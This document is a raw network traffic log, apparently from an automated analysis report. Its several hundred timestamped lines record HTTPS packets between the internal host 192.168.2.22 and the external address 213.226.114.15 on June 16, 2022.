Jun 16, 2022 20:22:58.594681025 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.594811916 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.594832897 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.594858885 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.594886065 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.594907045 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.595340014 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.595590115 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.595678091 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.595710039 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.595782995 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.595916986 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.596854925 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.596936941 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.596973896 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.597054958 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.597156048 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.598510027 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.598620892 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.598628044 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.598649979 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.598697901 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.598711967 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.598798990 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.600361109 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.600481033 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.600552082 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.600652933 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.614109039 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.614259005 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.614334106 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.614377022 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.614401102 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.614450932 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.624053001 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.654830933 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.654983997 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.654987097 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.655014992 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.655059099 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.655077934 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.655154943 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.655312061 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.655402899 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.655412912 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.655466080 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.655535936 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.656286955 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.656395912 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.656430006 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.656512976 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.656563044 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.657283068 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.657391071 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.657438040 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.657502890 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.658616066 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.658713102 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.658782005 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.658859015 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.660094976 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.660178900 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.660255909 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.660343885 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.661184072 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.661273956 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.661350012 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.661432981 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.662725925 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.662817955 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.662861109 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.662940025 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.674776077 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.674901962 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.674993992 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.675019026 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.675059080 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.675077915 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.675170898 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.714776039 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.714896917 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.715122938 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.715176105 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.715260983 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.715691090 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.715857983 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.715949059 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.715980053 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.716067076 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.716397047 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.716535091 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.716618061 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.716655016 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.716732979 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.717766047 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.719013929 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.719131947 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.719199896 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.719229937 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.719248056 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.719304085 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.719466925 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.720031977 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.720146894 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.720168114 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.720186949 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.720221043 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.720259905 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.720671892 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.720676899 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.720758915 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.720762014 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.720778942 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.720825911 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.720860004 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.720886946 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:58.720954895 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.721781969 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.722584009 CEST	49180	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:58.722613096 CEST	443	49180	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.100807905 CEST	49181	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.100871086 CEST	443	49181	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.101037025 CEST	49181	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.101325035 CEST	49181	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.101407051 CEST	443	49181	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.101473093 CEST	49181	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.119486094 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.119565964 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.119664907 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.120618105 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.120646000 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.290461063 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.290668011 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.295105934 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.295146942 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.383985996 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.384035110 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.465595961 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.465733051 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.465749979 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.465796947 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.465828896 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.465857029 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.528134108 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.528264999 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.528285980 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.528321981 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.528341055 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.528383017 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.528512001 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.591370106 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.591470003 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.591500998 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.591572046 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.591996908 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.592134953 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.592273951 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.592425108 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.592753887 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.592869043 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.592875957 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.592900038 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.592966080 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.594432116 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.606698036 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.606838942 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.606861115 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.606914043 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.606942892 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.606969118 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.638143063 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.651729107 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.651839972 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.651887894 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.651971102 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.655924082 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.656001091 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.656075001 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.656147957 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.657644033 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.657713890 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.657787085 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.657854080 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.658396006 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.658471107 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.658540010 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.658613920 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.659147978 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.659224987 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.692832947 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.692852974 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.692869902 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.692959070 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.692981005 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.713069916 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.713186979 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.713218927 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.713299036 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.713460922 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.713560104 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.713903904 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.713994026 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.717689037 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.717814922 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.891510010 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:22:59.891541004 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:22:59.891618967 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.038980961 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.039020061 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.039048910 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.039067984 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.039155006 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.039166927 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.039190054 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.039199114 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.039271116 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.039295912 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.244508982 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.244617939 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.272587061 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.272612095 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.272689104 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.314044952 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.314086914 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.314112902 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.314133883 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.314251900 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.314273119 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.314300060 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.314315081 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.314326048 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.314438105 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.409588099 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.409617901 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.409646988 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.409666061 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.409754992 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.409770012 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.409811020 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.409826040 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.409846067 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.409873009 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.409883022 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.409902096 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.409917116 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.409940958 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.409955978 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.409979105 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.409986973 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.410003901 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.410052061 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.410094976 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.410118103 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.410139084 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.410182953 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.410228968 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.410449028 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.410551071 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.410650969 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.410733938 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.410774946 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.410851955 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.410887957 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.410974026 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.411010027 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.411092997 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.411124945 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.411206007 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.411240101 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.411319971 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.411355972 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.411438942 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.411473989 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.411557913 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.411588907 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.411669970 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.411706924 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.411787033 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.411822081 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.411904097 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.411937952 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.412024975 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.412053108 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.412137032 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.412168026 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.412245035 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.412283897 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.412364960 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.412662983 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.412759066 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.412787914 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.412869930 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.620501995 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.620616913 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.640532017 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.640552998 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.640569925 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.640672922 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.640681982 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.640711069 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.640717983 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.640736103 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.640769958 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.640790939 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.642616987 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:00.848511934 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:00.849059105 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.288513899 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.288824081 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.299658060 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.299701929 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.299732924 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.299753904 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.299834967 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.299854994 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.299877882 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.299897909 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.299925089 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.299942017 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.299954891 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.299968958 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.299981117 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.299998045 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.300009966 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.300147057 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.300170898 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.300198078 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.300215960 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.300246954 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.300332069 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.300374985 CEST	443	49182	213.226.114.15	192.168.2.22
Jun 16, 2022 20:23:01.300400972 CEST	49182	443	192.168.2.22	213.226.114.15
Jun 16, 2022 20:23:01.300406933 CEST	49182	443	192.168.2.22	213.226.114.15
